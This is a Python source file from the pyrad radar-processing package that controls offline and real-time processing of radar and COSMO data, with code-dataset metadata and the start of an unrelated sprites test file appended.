"BSD-3-Clause"
] | 2
|
2021-02-08T09:44:40.000Z
|
2021-03-24T14:56:31.000Z
|
"""
pyrad.flow.flow_control
=======================
functions to control the Pyrad data processing flow
.. autosummary::
:toctree: generated/
main
main_rt
main_cosmo
main_cosmo_rt
main_gecsx
"""
from __future__ import print_function
import warnings
from warnings import warn
import traceback
import os
from datetime import datetime
from datetime import timedelta
import gc
import subprocess
import queue
import time
from pathlib import Path
from pyart import version as pyart_version
from pyrad import version as pyrad_version
from .flow_aux import _warning_format, _initialize_listener
from .flow_aux import _create_cfg_dict, _create_datacfg_dict
from .flow_aux import _get_times_and_traj, _get_datatype_list
from .flow_aux import _get_datasets_list, _get_masterfile_list
from .flow_aux import _wait_for_files, _get_radars_data
from .flow_aux import _initialize_datasets
from .flow_aux import _process_datasets, _postprocess_datasets
from ..io.io_aux import get_datetime
from ..io.read_data_other import read_last_state
from ..io.write_data import write_last_state
# When True, main()/main_rt() start a keyboard listener so the user can
# request a clean shutdown between volumes.
ALLOW_USER_BREAK = False

# dask (plus distributed/bokeh for profiling output) is optional: without it
# the flow-control functions silently fall back to serial processing.
try:
    import dask
    from dask.diagnostics import Profiler, ResourceProfiler, CacheProfiler
    from dask.diagnostics import visualize
    from distributed import Client
    from bokeh.io import export_png
    _DASK_AVAILABLE = True
except ImportError:
    warn('dask not available: The processing will not be parallelized')
    _DASK_AVAILABLE = False
def main(cfgfile, starttime=None, endtime=None, trajfile="", trajtype='plane',
         flashnr=0, infostr="", MULTIPROCESSING_DSET=False,
         MULTIPROCESSING_PROD=False, PROFILE_MULTIPROCESSING=False,
         USE_CHILD_PROCESS=False):
    """
    Main flow control. Processes radar data off-line over a period of time
    given either by the user, a trajectory file, or determined by the last
    volume processed and the current time. Multiple radars can be processed
    simultaneously

    Parameters
    ----------
    cfgfile : str
        path of the main config file
    starttime, endtime : datetime object
        start and end time of the data to be processed
    trajfile : str
        path to file describing the trajectory
    trajtype : str
        type of trajectory file. Can be either 'plane', 'lightning' or
        'proc_periods'
    flashnr : int
        If larger than 0 will select a flash in a lightning trajectory file.
        If 0 the data corresponding to the trajectory of all flashes will be
        plotted
    infostr : str
        Information string about the actual data processing
        (e.g. 'RUN57'). This string is added to product files.
    MULTIPROCESSING_DSET : Bool
        If true the generation of datasets at the same processing level will
        be parallelized
    MULTIPROCESSING_PROD : Bool
        If true the generation of products from each dataset will be
        parallelized
    PROFILE_MULTIPROCESSING : Bool
        If true and code parallelized the multiprocessing is profiled
    USE_CHILD_PROCESS : Bool
        If true the reading and processing of the data will be performed by
        a child process controlled by dask. This is done to make sure all
        memory used is released.
    """
    print("- PYRAD version: {} (compiled {} by {})".format(
        pyrad_version.version, pyrad_version.compile_date_time,
        pyrad_version.username))
    print("- PYART version: {}".format(pyart_version.version))

    # Define behaviour of warnings
    warnings.simplefilter('always')  # always print matching warnings
    # warnings.simplefilter('error')  # turn matching warnings into exceptions
    warnings.formatwarning = _warning_format  # define format

    if ALLOW_USER_BREAK:
        input_queue = _initialize_listener()

    # Without dask, every parallel/child-process option is forced off.
    if not _DASK_AVAILABLE:
        MULTIPROCESSING_DSET = False
        MULTIPROCESSING_PROD = False
        PROFILE_MULTIPROCESSING = False
        USE_CHILD_PROCESS = False

    # check if multiprocessing profiling is necessary: profiling is only
    # done when exactly one of the three dask-based modes is active.
    if (not MULTIPROCESSING_DSET and not MULTIPROCESSING_PROD and
            not USE_CHILD_PROCESS):
        PROFILE_MULTIPROCESSING = False
    elif (int(MULTIPROCESSING_DSET)+int(MULTIPROCESSING_PROD) +
            int(USE_CHILD_PROCESS) > 1):
        PROFILE_MULTIPROCESSING = False

    if (int(MULTIPROCESSING_DSET)+int(MULTIPROCESSING_PROD) +
            int(USE_CHILD_PROCESS) > 1):
        # necessary to launch tasks from tasks
        Client()

    if PROFILE_MULTIPROCESSING:
        prof = Profiler()
        rprof = ResourceProfiler()
        cprof = CacheProfiler()
        prof.register()
        rprof.register()
        cprof.register()

    cfg = _create_cfg_dict(cfgfile)
    datacfg = _create_datacfg_dict(cfg)

    # Determine the processing periods (and optional trajectory object).
    starttimes, endtimes, traj = _get_times_and_traj(
        trajfile, starttime, endtime, cfg['ScanPeriod'],
        last_state_file=cfg['lastStateFile'], trajtype=trajtype,
        flashnr=flashnr)

    if infostr:
        print('- Info string : {}'.format(infostr))

    # get data types and levels (one descriptor list per radar)
    datatypesdescr_list = list()
    for i in range(1, cfg['NumRadars']+1):
        datatypesdescr_list.append(
            _get_datatype_list(cfg, radarnr='RADAR'+'{:03d}'.format(i)))

    dataset_levels = _get_datasets_list(cfg)

    # The master (first) radar's file list drives the processing loop.
    masterfilelist, masterdatatypedescr, masterscan = _get_masterfile_list(
        datatypesdescr_list[0], starttimes, endtimes, datacfg,
        scan_list=datacfg['ScanList'])

    nvolumes = len(masterfilelist)
    if nvolumes == 0:
        raise ValueError(
            "ERROR: Could not find any valid volumes between "
            "{} and {} for master scan '{}' and master data type '{}'".format(
                starttimes[0].strftime('%Y-%m-%d %H:%M:%S'),
                endtimes[-1].strftime('%Y-%m-%d %H:%M:%S'), masterscan,
                masterdatatypedescr))
    print('- Number of volumes to process: {}'.format(nvolumes))
    print('- Start time: {}'.format(
        starttimes[0].strftime("%Y-%m-%d %H:%M:%S")))
    print('- end time: {}'.format(endtimes[-1].strftime("%Y-%m-%d %H:%M:%S")))

    # initial processing of the datasets
    print('\n\n- Initializing datasets:')
    dscfg, traj = _initialize_datasets(
        dataset_levels, cfg, traj=traj, infostr=infostr)

    # process all data files in file list or until user interrupts processing
    for masterfile in masterfilelist:
        if ALLOW_USER_BREAK:
            # check if user has requested exit
            try:
                input_queue.get_nowait()
                warn('Program terminated by user')
                break
            except queue.Empty:
                pass

        print('\n- master file: {}'.format(os.path.basename(masterfile)))
        master_voltime = get_datetime(masterfile, masterdatatypedescr)

        if USE_CHILD_PROCESS:
            # Read and process in a dask-controlled child task so that the
            # memory used per volume is released when the task ends.
            data_reading = dask.delayed(_get_radars_data)(
                master_voltime, datatypesdescr_list, datacfg,
                num_radars=datacfg['NumRadars'])
            try:
                radar_list = data_reading.compute()
                del data_reading
                # dscfg/traj are wrapped so the delayed task sees the current
                # state and returns the updated one.
                dscfg_aux = dask.delayed(dscfg)
                traj_aux = dask.delayed(traj)
                data_processing = dask.delayed(_process_datasets)(
                    dataset_levels, cfg, dscfg_aux, radar_list,
                    master_voltime, traj=traj_aux, infostr=infostr,
                    MULTIPROCESSING_DSET=MULTIPROCESSING_DSET,
                    MULTIPROCESSING_PROD=MULTIPROCESSING_PROD)
                try:
                    dscfg, traj = data_processing.compute()
                    del data_processing
                    del radar_list
                    del dscfg_aux
                    del traj_aux
                except Exception as ee:
                    # A failed volume is logged and skipped, not fatal.
                    warn(str(ee))
                    traceback.print_exc()
            except Exception as ee:
                warn(str(ee))
                traceback.print_exc()
        else:
            radar_list = _get_radars_data(
                master_voltime, datatypesdescr_list, datacfg,
                num_radars=datacfg['NumRadars'])

            # process all data sets
            dscfg, traj = _process_datasets(
                dataset_levels, cfg, dscfg, radar_list, master_voltime, traj=traj,
                infostr=infostr, MULTIPROCESSING_DSET=MULTIPROCESSING_DSET,
                MULTIPROCESSING_PROD=MULTIPROCESSING_PROD)

            # delete variables
            del radar_list

        gc.collect()

    # post-processing of the datasets
    print('\n\n- Post-processing datasets:')
    dscfg, traj = _postprocess_datasets(
        dataset_levels, cfg, dscfg, traj=traj, infostr=infostr)

    if PROFILE_MULTIPROCESSING:
        prof.unregister()
        rprof.unregister()
        cprof.unregister()
        # Save the combined dask profile as a PNG under ~/profiling/.
        bokeh_plot = visualize([prof, rprof, cprof], show=False, save=False)
        profile_path = os.path.expanduser('~')+'/profiling/'
        if not os.path.isdir(profile_path):
            os.makedirs(profile_path)
        export_png(bokeh_plot, filename=(
            profile_path+datetime.utcnow().strftime('%Y%m%d%H%M%S') +
            '_profile.png'))

    print('- This is the end my friend! See you soon!')
def main_rt(cfgfile_list, starttime=None, endtime=None, infostr_list=None,
            proc_period=60, proc_finish=None):
    """
    main flow control. Processes radar data in real time. The start and end
    processing times can be determined by the user. This function is inteded
    for a single radar

    Parameters
    ----------
    cfgfile_list : list of str
        path of the main config files
    starttime, endtime : datetime object
        start and end time of the data to be processed
    infostr_list : list of str
        Information string about the actual data processing
        (e.g. 'RUN57'). This string is added to product files.
    proc_period : int
        period of time before starting a new processing round (seconds)
    proc_finish : int or None
        if set to a value the program will be forced to shut down after the
        value (in seconds) from start time has been exceeded

    Returns
    -------
    end_proc : Boolean
        If true the program has ended successfully
    """
    print("- PYRAD version: %s (compiled %s by %s)" %
          (pyrad_version.version, pyrad_version.compile_date_time,
           pyrad_version.username))
    print("- PYART version: " + pyart_version.version)

    # Define behaviour of warnings
    warnings.simplefilter('always')  # always print matching warnings
    # warnings.simplefilter('error')  # turn matching warnings into exceptions
    warnings.formatwarning = _warning_format  # define format

    # The processing will be allowed to run for a limited period
    if proc_finish is not None:
        startime_proc = datetime.utcnow()
        # for offline testing
        # startime_proc = startime_proc.replace(
        #     year=endtime.year, month=endtime.month, day=endtime.day)
        # startime_proc = startime_proc.replace(hour=10)

        endtime_proc = startime_proc+timedelta(seconds=proc_finish)

    if ALLOW_USER_BREAK:
        input_queue = _initialize_listener()

    # Per-config state, all indexed by icfg in the loops below.
    cfg_list = []
    datacfg_list = []
    dscfg_list = []
    datatypesdescr_list_list = []
    dataset_levels_list = []
    last_processed_list = []
    for icfg, cfgfile in enumerate(cfgfile_list):
        cfg = _create_cfg_dict(cfgfile)
        if infostr_list is not None:
            infostr = infostr_list[icfg]
        else:
            infostr = ""
        datacfg = _create_datacfg_dict(cfg)

        if infostr:
            print('- Info string : ' + infostr)

        # find out last processed volume
        last_processed = read_last_state(cfg['lastStateFile'])
        if last_processed is None:
            print('- last processed volume unknown')
        else:
            print('- last processed volume: '+last_processed.strftime(
                '%Y%m%d%H%M%S'))
        last_processed_list.append(last_processed)

        # get data types and levels
        datatypesdescr_list = list()
        for i in range(1, cfg['NumRadars']+1):
            datatypesdescr_list.append(
                _get_datatype_list(cfg, radarnr='RADAR'+'{:03d}'.format(i)))

        dataset_levels = _get_datasets_list(cfg)

        # initial processing of the datasets
        print('\n\n- Initializing datasets:')
        dscfg, traj = _initialize_datasets(
            dataset_levels, cfg, infostr=infostr)

        cfg_list.append(cfg)
        datacfg_list.append(datacfg)
        dscfg_list.append(dscfg)
        datatypesdescr_list_list.append(datatypesdescr_list)
        dataset_levels_list.append(dataset_levels)

        # remove variables from memory
        del cfg
        del datacfg
        del dscfg
        del datatypesdescr_list
        del dataset_levels
        del last_processed
        del traj
        gc.collect()

    # Main real-time loop: one round per proc_period until stopped.
    end_proc = False
    while not end_proc:
        if ALLOW_USER_BREAK:
            # check if user has requested exit
            try:
                user_input = input_queue.get_nowait()
                end_proc = user_input
                warn('Program terminated by user')
                break
            except queue.Empty:
                pass

        nowtime = datetime.utcnow()
        # for offline testing
        # nowtime = nowtime.replace(
        #     year=endtime.year, month=endtime.month, day=endtime.day)
        # nowtime = nowtime.replace(hour=10)

        # if processing end time exceeded finalize processing
        if proc_finish is not None:
            if nowtime >= endtime_proc:
                end_proc = True
                warn('Allowed processing time exceeded')
                break

        # end time has been set and current time older than end time
        # quit processing
        if endtime is not None:
            if nowtime > endtime:
                end_proc = True
                break

        # start time has been set. Check if current time has to be
        # processed. If not sleep until next proc_period
        if starttime is not None:
            if nowtime < starttime:
                time.sleep(proc_period)
                continue

        vol_processed = False
        for icfg, cfg in enumerate(cfg_list):
            if ALLOW_USER_BREAK:
                # check if user has requested exit
                try:
                    user_input = input_queue.get_nowait()
                    end_proc = user_input
                    warn('Program terminated by user')
                    break
                except queue.Empty:
                    pass

            datacfg = datacfg_list[icfg]
            dscfg = dscfg_list[icfg]
            datatypesdescr_list = datatypesdescr_list_list[icfg]
            dataset_levels = dataset_levels_list[icfg]
            last_processed = last_processed_list[icfg]
            if infostr_list is not None:
                infostr = infostr_list[icfg]
            else:
                infostr = ""

            # wait until new files are available
            masterfile, masterdatatypedescr, last_processed = _wait_for_files(
                nowtime, datacfg, datatypesdescr_list[0],
                last_processed=last_processed)

            if masterfile is None:
                # no new volume for this config: persist the (possibly
                # advanced) last-processed state and move to the next config
                last_processed_list[icfg] = last_processed
                if last_processed is not None:
                    write_last_state(last_processed, cfg['lastStateFile'])
                continue

            print('\n- master file: ' + os.path.basename(masterfile))
            master_voltime = get_datetime(masterfile, masterdatatypedescr)

            # get data of master radar
            radar_list = _get_radars_data(
                master_voltime, datatypesdescr_list, datacfg)

            # process all data sets
            dscfg, traj = _process_datasets(
                dataset_levels, cfg, dscfg, radar_list, master_voltime,
                infostr=infostr)

            last_processed_list[icfg] = master_voltime
            write_last_state(master_voltime, cfg['lastStateFile'])
            dscfg_list[icfg] = dscfg
            vol_processed = True

            # remove variables from memory
            del radar_list
            del cfg
            del datacfg
            del dscfg
            del datatypesdescr_list
            del dataset_levels
            del last_processed
            del traj
            gc.collect()

        nowtime_new = datetime.utcnow()
        # for offline testing
        # nowtime_new = nowtime_new.replace(
        #     year=endtime.year, month=endtime.month, day=endtime.day)
        # nowtime_new = nowtime_new.replace(hour=10)

        proc_time = (nowtime_new-nowtime).total_seconds()
        if vol_processed:
            print('Processing time %s s\n' % proc_time)

        # if processing end time exceeded finalize processing
        if proc_finish is not None:
            if nowtime_new >= endtime_proc:
                end_proc = True
                warn('Allowed processing time exceeded')
                break

        # sleep out the remainder of the round before polling again
        if proc_time < proc_period:
            time.sleep(proc_period-proc_time)

    # only do post processing if program properly terminated by user
    if end_proc:
        # post-processing of the datasets
        print('\n\n- Post-processing datasets:')
        for icfg, cfg in enumerate(cfg_list):
            dscfg = dscfg_list[icfg]
            dataset_levels = dataset_levels_list[icfg]
            if infostr_list is not None:
                infostr = infostr_list[icfg]
            else:
                infostr = ""

            # BUGFIX: pass the per-config info string instead of a literal
            # None — previously infostr was computed above and then discarded,
            # inconsistent with main(), which forwards infostr here.
            dscfg, traj = _postprocess_datasets(
                dataset_levels, cfg, dscfg, infostr=infostr)

            # remove variables from memory
            del cfg
            del dscfg
            del dataset_levels
            del traj
            gc.collect()

    print('- This is the end my friend! See you soon!')

    return end_proc
def main_cosmo(cfgfile, starttime=None, endtime=None, trajfile="", infostr=""):
    """
    Main flow control. Processes radar data off-line over a period of time
    given either by the user, a trajectory file, or determined by the last
    volume processed and the current time. Multiple radars can be processed
    simultaneously

    Parameters
    ----------
    cfgfile : str
        path of the main config file
    starttime, endtime : datetime object
        start and end time of the data to be processed
    trajfile : str
        path to file describing the trajectory
    infostr : str
        Information string about the actual data processing
        (e.g. 'RUN57'). This string is added to product files.
    """
    print("- PYRAD version: {} (compiled {} by {})".format(
        pyrad_version.version, pyrad_version.compile_date_time,
        pyrad_version.username))
    print("- PYART version: {}".format(pyart_version.version))

    # Define behaviour of warnings
    warnings.simplefilter('always')  # always print matching warnings
    # warnings.simplefilter('error')  # turn matching warnings into exceptions
    warnings.formatwarning = _warning_format  # define format

    cfg = _create_cfg_dict(cfgfile)
    datacfg = _create_datacfg_dict(cfg)

    # COSMO processing always uses 'proc_periods' trajectories.
    starttimes, endtimes, traj = _get_times_and_traj(
        trajfile, starttime, endtime, cfg['ScanPeriod'],
        last_state_file=cfg['lastStateFile'], trajtype='proc_periods')

    if infostr:
        print('- Info string : {}'.format(infostr))

    # get data types and levels (one descriptor list per radar)
    datatypesdescr_list = list()
    for i in range(1, cfg['NumRadars']+1):
        datatypesdescr_list.append(
            _get_datatype_list(cfg, radarnr='RADAR'+'{:03d}'.format(i)))

    dataset_levels = _get_datasets_list(cfg)

    # The first radar's file list drives the processing loop.
    masterfilelist, masterdatatypedescr, masterscan = _get_masterfile_list(
        datatypesdescr_list[0], starttimes, endtimes, datacfg)

    nvolumes = len(masterfilelist)
    if nvolumes == 0:
        raise ValueError(
            "ERROR: Could not find any valid COSMO data between "
            "{} and {}".format(
                starttimes[0].strftime('%Y-%m-%d %H:%M:%S'),
                endtimes[-1].strftime('%Y-%m-%d %H:%M:%S')))
    print('- Number of volumes to process: {}'.format(nvolumes))
    print('- Start time: {}'.format(
        starttimes[0].strftime("%Y-%m-%d %H:%M:%S")))
    print('- end time: {}'.format(endtimes[-1].strftime("%Y-%m-%d %H:%M:%S")))

    # initial processing of the datasets
    print('\n\n- Initializing datasets:')
    dscfg, traj = _initialize_datasets(
        dataset_levels, cfg, traj=traj, infostr=infostr)

    # process all data files in file list
    for masterfile in masterfilelist:
        print('\n- master file: {}'.format(os.path.basename(masterfile)))
        master_voltime = get_datetime(masterfile, masterdatatypedescr)

        # process all data sets; COSMO processing passes no radar list
        dscfg, traj = _process_datasets(
            dataset_levels, cfg, dscfg, None, master_voltime, traj=traj,
            infostr=infostr)

        gc.collect()

    print('- This is the end my friend! See you soon!')
def main_cosmo_rt(cfgfile_list, starttime=None, endtime=None, infostr_list=None,
                  proc_period=60, proc_finish=None):
    """
    Main flow control. Processes radar data in real time. The start and end
    processing times can be determined by the user. This function is intended
    for a single radar.

    Parameters
    ----------
    cfgfile_list : list of str
        path of the main config files
    starttime, endtime : datetime object
        start and end time of the data to be processed
    infostr_list : list of str
        Information string about the actual data processing
        (e.g. 'RUN57'). This string is added to product files.
    proc_period : int
        period of time before starting a new processing round (seconds)
    proc_finish : int or None
        if set to a value the program will be forced to shut down after the
        value (in seconds) from start time has been exceeded

    Returns
    -------
    end_proc : Boolean
        If true the program has ended successfully
    """
    print("- PYRAD version: %s (compiled %s by %s)" %
          (pyrad_version.version, pyrad_version.compile_date_time,
           pyrad_version.username))
    print("- PYART version: " + pyart_version.version)

    # Define behaviour of warnings
    warnings.simplefilter('always')  # always print matching warnings
    warnings.formatwarning = _warning_format  # define format

    # The processing will only be allowed to run for a limited period
    if proc_finish is not None:
        startime_proc = datetime.utcnow()
        endtime_proc = startime_proc+timedelta(seconds=proc_finish)

    if ALLOW_USER_BREAK:
        input_queue = _initialize_listener()

    # Per-config state, aligned by index with cfgfile_list
    cfg_list = []
    datacfg_list = []
    dscfg_list = []
    datatypesdescr_list_list = []
    dataset_levels_list = []
    last_processed_list = []

    # Pre-bind the names deleted after the loop so the cleanup cannot raise
    # NameError if cfgfile_list is empty
    cfg = datacfg = dscfg = None
    datatypesdescr_list = dataset_levels = None
    last_processed = traj = None

    for icfg, cfgfile in enumerate(cfgfile_list):
        cfg = _create_cfg_dict(cfgfile)
        if infostr_list is not None:
            infostr = infostr_list[icfg]
        else:
            infostr = ""
        datacfg = _create_datacfg_dict(cfg)

        if infostr:
            print('- Info string : ' + infostr)

        # find out last processed volume
        last_processed = read_last_state(cfg['lastStateFile'])
        if last_processed is None:
            print('- last processed volume unknown')
        else:
            print('- last processed volume: '+last_processed.strftime(
                '%Y%m%d%H%M%S'))
        last_processed_list.append(last_processed)

        # get data types and levels
        datatypesdescr_list = list()
        for i in range(1, cfg['NumRadars']+1):
            datatypesdescr_list.append(
                _get_datatype_list(cfg, radarnr='RADAR'+'{:03d}'.format(i)))

        dataset_levels = _get_datasets_list(cfg)

        # initial processing of the datasets
        print('\n\n- Initializing datasets:')
        dscfg, traj = _initialize_datasets(
            dataset_levels, cfg, infostr=infostr)

        cfg_list.append(cfg)
        datacfg_list.append(datacfg)
        dscfg_list.append(dscfg)
        datatypesdescr_list_list.append(datatypesdescr_list)
        dataset_levels_list.append(dataset_levels)

    # remove variables from memory
    del cfg
    del datacfg
    del dscfg
    del datatypesdescr_list
    del dataset_levels
    del last_processed
    del traj

    gc.collect()

    end_proc = False
    while not end_proc:
        if ALLOW_USER_BREAK:
            # check if user has requested exit
            try:
                user_input = input_queue.get_nowait()
                end_proc = user_input
                warn('Program terminated by user')
                break
            except queue.Empty:
                pass

        nowtime = datetime.utcnow()

        # if processing end time exceeded finalize processing
        if proc_finish is not None:
            if nowtime >= endtime_proc:
                end_proc = True
                warn('Allowed processing time exceeded')
                break

        # end time has been set and current time older than end time
        # quit processing
        if endtime is not None:
            if nowtime > endtime:
                end_proc = True
                break

        # start time has been set. Check if current time has to be
        # processed. If not sleep until next proc_period
        if starttime is not None:
            if nowtime < starttime:
                time.sleep(proc_period)
                continue

        # Pre-bind the names deleted at the end of the round. The previous
        # version deleted e.g. 'traj' unconditionally even though it is only
        # bound when a volume was actually processed, raising NameError on
        # rounds without new data or when the user-break fired early.
        cfg = datacfg = dscfg = None
        datatypesdescr_list = dataset_levels = None
        last_processed = traj = None

        vol_processed = False
        for icfg, cfg in enumerate(cfg_list):
            if ALLOW_USER_BREAK:
                # check if user has requested exit
                try:
                    user_input = input_queue.get_nowait()
                    end_proc = user_input
                    warn('Program terminated by user')
                    break
                except queue.Empty:
                    pass

            datacfg = datacfg_list[icfg]
            dscfg = dscfg_list[icfg]
            datatypesdescr_list = datatypesdescr_list_list[icfg]
            dataset_levels = dataset_levels_list[icfg]
            last_processed = last_processed_list[icfg]
            if infostr_list is not None:
                infostr = infostr_list[icfg]
            else:
                infostr = ""

            # wait until new files are available
            masterfile, masterdatatypedescr, last_processed = _wait_for_files(
                nowtime, datacfg, datatypesdescr_list[0],
                last_processed=last_processed)

            if masterfile is None:
                # no new volume for this config: persist the state and move
                # on to the next config
                last_processed_list[icfg] = last_processed
                if last_processed is not None:
                    write_last_state(last_processed, cfg['lastStateFile'])
                continue

            print('\n- master file: ' + os.path.basename(masterfile))
            master_voltime = get_datetime(masterfile, masterdatatypedescr)

            # process all data sets
            dscfg, traj = _process_datasets(
                dataset_levels, cfg, dscfg, None, master_voltime,
                infostr=infostr)

            last_processed_list[icfg] = master_voltime
            write_last_state(master_voltime, cfg['lastStateFile'])
            dscfg_list[icfg] = dscfg
            vol_processed = True

        # remove variables from memory
        del cfg
        del datacfg
        del dscfg
        del datatypesdescr_list
        del dataset_levels
        del last_processed
        del traj

        gc.collect()

        nowtime_new = datetime.utcnow()
        proc_time = (nowtime_new-nowtime).total_seconds()
        if vol_processed:
            print('Processing time %s s\n' % proc_time)

        # if processing end time exceeded finalize processing
        if proc_finish is not None:
            if nowtime_new >= endtime_proc:
                end_proc = True
                warn('Allowed processing time exceeded')
                break

        # sleep out the remainder of the processing period
        if proc_time < proc_period:
            time.sleep(proc_period-proc_time)

    print('- This is the end my friend! See you soon!')

    return end_proc
def main_gecsx(cfgfile, starttime=None, endtime=None, infostr="",
               gather_plots=True):
    """
    Main flow control for GECSX. Processes radar data off-line over a period
    of time given either by the user or determined by the current time.

    Parameters
    ----------
    cfgfile : str
        path of the main config file
    starttime, endtime : datetime object
        start and end time of the radar data to be used as reference for
        gecsx
    infostr : str
        Information string about the actual data processing
        (e.g. 'RUN57'). This string is added to product files.
    gather_plots : bool
        If True, all generated figures are additionally copied into an
        ALL_FIGURES subdirectory of every dataset output directory.
    """
    GECSX_MANDATORY = ['frequency', 'radar_beam_width_h', 'pulse_width',
                       'txpwrh', 'AntennaGainH', 'mflossh', 'lrxh']
    GECSX_OPTIONAL = ['attg', 'AzimTol', 'mosotti_factor', 'refcorr',
                      'RadarPosition']

    print("- PYRAD version: {} (compiled {} by {})".format(
        pyrad_version.version, pyrad_version.compile_date_time,
        pyrad_version.username))
    print("- PYART version: {}".format(pyart_version.version))

    # Define behaviour of warnings
    warnings.simplefilter('always')  # always print matching warnings
    warnings.formatwarning = _warning_format  # define format

    cfg = _create_cfg_dict(cfgfile)
    datacfg = _create_datacfg_dict(cfg)

    # Without explicit times, fall back to "now"
    if starttime is None:
        starttime = datetime.now()
        endtime = starttime
    if endtime is None:
        endtime = datetime.now()

    if infostr:
        print('- Info string : {}'.format(infostr))

    if cfg['datapath'] is not None:
        starttimes, endtimes, _ = _get_times_and_traj(
            None, starttime, endtime, cfg['ScanPeriod'],
            last_state_file=cfg['lastStateFile'], trajtype='proc_periods')

    # get data types and levels
    datatypesdescr_list = list()
    for i in range(1, cfg['NumRadars']+1):
        datatypesdescr_list.append(
            _get_datatype_list(cfg, radarnr='RADAR'+'{:03d}'.format(i)))

    dataset_levels = _get_datasets_list(cfg)

    if cfg['datapath'] is not None:
        masterfilelist, masterdatatypedescr, _ = _get_masterfile_list(
            datatypesdescr_list[0], starttimes, endtimes, datacfg,
            datacfg['ScanList'])

        nvolumes = len(masterfilelist)
        if nvolumes == 0:
            # radar data is only a reference for GECSX, so this is not fatal
            warn("WARNING: Could not find any valid radar data between "
                 "{} and {}".format(
                     starttimes[0].strftime('%Y-%m-%d %H:%M:%S'),
                     endtimes[-1].strftime('%Y-%m-%d %H:%M:%S')))
            warn('WARNING: Proceeding without radar reference')
        print('- Number of volumes to process: {}'.format(nvolumes))
        print('- Start time: {}'.format(
            starttimes[0].strftime("%Y-%m-%d %H:%M:%S")))
        print('- end time: {}'.format(endtimes[-1].
                                      strftime("%Y-%m-%d %H:%M:%S")))
    else:
        masterfilelist = []

    # For GECSX we treat only one master file, since the method does not
    # depend on time
    if len(masterfilelist) != 0:
        masterfile = masterfilelist[0]
        master_voltime = get_datetime(masterfile, masterdatatypedescr)

        # get data of master radar
        radar_list = _get_radars_data(
            master_voltime, datatypesdescr_list, datacfg)
    else:
        radar_list = []

    # initial processing of the datasets
    print('\n\n- Initializing datasets:')
    dscfg, _ = _initialize_datasets(
        dataset_levels, cfg, infostr=infostr)

    # For GECSX we copy some keys from the datacfg dict to the dataset dict.
    # Values already present in the dataset dict take precedence.
    for dset in dscfg.values():
        for k in GECSX_MANDATORY:
            if k in dset:
                continue
            try:
                dset[k] = datacfg[k]
            except KeyError as exc:
                # only a missing key is an error here; the previous bare
                # 'except:' hid the original cause
                raise ValueError(
                    'Mandatory GECSX key {:s} is missing from loc '
                    'file'.format(k)) from exc
        for k in GECSX_OPTIONAL:
            if k in datacfg:
                dset[k] = datacfg[k]

        if len(radar_list) == 0:
            # no radar reference: a complete RadarPosition becomes mandatory
            valid_radarpos = False
            if 'RadarPosition' in dset:
                if ('latitude' in dset['RadarPosition'] and
                        'longitude' in dset['RadarPosition'] and
                        'altitude' in dset['RadarPosition']):
                    valid_radarpos = True
            if not valid_radarpos:
                raise ValueError('When no radar data is provided, the structure ' +
                                 '"RadarPosition" with field "altitude", "latitude" '
                                 + 'and "longitude" must be provided in the loc file')
            # normalize scalar positions to single-element lists
            for k in dset['RadarPosition']:
                if not isinstance(dset['RadarPosition'][k], list):
                    dset['RadarPosition'][k] = [dset['RadarPosition'][k]]

    # process all data sets
    dscfg, _ = _process_datasets(
        dataset_levels, cfg, dscfg, radar_list, None, None,
        infostr=infostr)

    gc.collect()

    if gather_plots:
        import shutil  # local import: only needed for the gather step
        img_ext = cfg['imgformat']
        for dset in dscfg:
            gather_dir = str(Path(cfg['saveimgbasepath'], cfg['name'], dset))
            print('Copying all generated figures into dir {:s}...'.format(
                gather_dir + '/ALL_FIGURES/'))
            if not os.path.exists(gather_dir):
                continue
            # Pure-Python replacement of the previous
            # "find ... -exec cp" shell=True call: portable and not subject
            # to shell interpretation of the configured paths
            dest = Path(gather_dir, 'ALL_FIGURES')
            dest.mkdir(parents=True, exist_ok=True)
            for ex in img_ext:
                for fig in Path(gather_dir).rglob('*.' + ex):
                    # skip files already gathered (cp onto itself)
                    if fig.is_file() and fig.parent != dest:
                        shutil.copy(str(fig), str(dest))

    print('- This is the end my friend! See you soon!')
| 35.520897
| 109
| 0.613987
| 3,997
| 34,846
| 5.178634
| 0.102077
| 0.026378
| 0.008261
| 0.007971
| 0.786705
| 0.779651
| 0.766607
| 0.758829
| 0.744964
| 0.740036
| 0
| 0.00305
| 0.303736
| 34,846
| 980
| 110
| 35.557143
| 0.850095
| 0.231016
| 0
| 0.736577
| 1
| 0
| 0.115207
| 0
| 0.008389
| 0
| 0
| 0
| 0
| 1
| 0.008389
| false
| 0.008389
| 0.050336
| 0
| 0.062081
| 0.083893
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f7d0c16bcd4756a36c52dc85e6d2621f63eaa23
| 18,255
|
py
|
Python
|
tests/test_sprites_package.py
|
fabricejumel/python-aturtle
|
008f71a5e506cb58465f85ee9dc8ea1bffa6fc49
|
[
"MIT"
] | 3
|
2019-12-23T15:25:39.000Z
|
2022-02-25T22:09:49.000Z
|
tests/test_sprites_package.py
|
fabricejumel/python-aturtle
|
008f71a5e506cb58465f85ee9dc8ea1bffa6fc49
|
[
"MIT"
] | 55
|
2019-12-27T14:05:02.000Z
|
2020-02-01T09:53:42.000Z
|
tests/test_sprites_package.py
|
fabricejumel/python-aturtle
|
008f71a5e506cb58465f85ee9dc8ea1bffa6fc49
|
[
"MIT"
] | 1
|
2020-02-25T08:18:51.000Z
|
2020-02-25T08:18:51.000Z
|
# ----------------------------------------------------------------------------
# Python A-Turtle
# ----------------------------------------------------------------------------
# Copyright (c) Tiago Montes.
# See LICENSE for details.
# ----------------------------------------------------------------------------
import contextlib
import pathlib
import unittest
from unittest import mock
from aturtle import sprites
from aturtle.shapes import bitmap, vector
class TestTarget(unittest.TestCase):

    """
    create_sprite must accept both a raw canvas and a window object,
    using the window's .canvas attribute in the latter case.
    """

    def setUp(self):
        # Replace the shape and sprite classes with mocks so that no real
        # objects are ever built by create_sprite.
        self.bitmap_shape_mock = mock.Mock()
        self.vector_shape_mock = mock.Mock()
        self.bitmap_sprite_mock = mock.Mock()
        self.vector_sprite_mock = mock.Mock()
        self.exit_stack = contextlib.ExitStack()
        mock_targets = {
            'aturtle.sprites._BitmapShape': self.bitmap_shape_mock,
            'aturtle.sprites._VectorShape': self.vector_shape_mock,
